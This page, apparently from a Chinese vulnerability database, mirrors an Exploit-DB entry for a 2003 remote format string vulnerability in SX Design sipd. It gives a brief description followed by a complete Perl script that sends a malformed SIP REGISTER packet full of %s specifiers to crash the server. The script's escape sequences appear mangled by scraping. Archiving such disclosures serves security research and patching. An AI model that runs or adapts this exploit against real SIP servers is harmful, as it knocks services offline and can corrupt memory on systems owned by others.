SX Design sipd 0.1.2/0.1.4 – Remote Format String

SX Design sipd 0.1.2/0.1.4 – Remote Format String

漏洞ID 1054302 漏洞类型
发布时间 2003-12-16 更新时间 2003-12-16
图片[1]-SX Design sipd 0.1.2/0.1.4 – Remote Format String-安全小百科CVE编号 N/A
图片[2]-SX Design sipd 0.1.2/0.1.4 – Remote Format String-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23444
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9236/info

sipd has been reported prone to a format string vulnerability that may be triggered remotely. It has been reported that sip URI arguments passed to the affected server are not sufficiently handled. An attacker may place format specifiers in the URI and they will be handled literally, potentially allowing the attacker to read from and write to arbitrary memory.

#!/usr/bin/perl

# SIPd - SIP Password Format String
# Kills sipd version 0.1.4 and prior

use IO::Socket;
use strict;

unless (@ARGV == 2) { die "usage: $0 host your_ip [port]" }

my $remote_host = shift(@ARGV);
my $your_host = shift(@ARGV);
my $port = shift(@ARGV);
if ($port eq "")
{
 $port = "5060";
}

my $buf = "REGISTER sip::%s%s%s%s%s%s%s%s%s%s%s%s%s%s@$remote_host SIP/2.0r
Via: SIP/2.0/UDP $your_host:3277r
From: "STORM" <sip:$your_host:3277>r
To: <sip:$your_host:3277>r
Call-ID: 12312312@$your_hostr
CSeq: 1 OPTIONSr
Max-Forwards: 70r
rn";

my $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@n";
my $ipaddr = inet_aton($remote_host) || $remote_host;
my $portaddr = sockaddr_in($port, $ipaddr);

send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!n";

print "Now, '$remote_host' must be dead :)n";

相关推荐: SepCity Community Wizard login.asp SQL Injection Vulnerability

SepCity Community Wizard login.asp SQL Injection Vulnerability 漏洞ID 1099488 漏洞类型 Input Validation Error 发布时间 2003-09-19 更新时间 2003-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享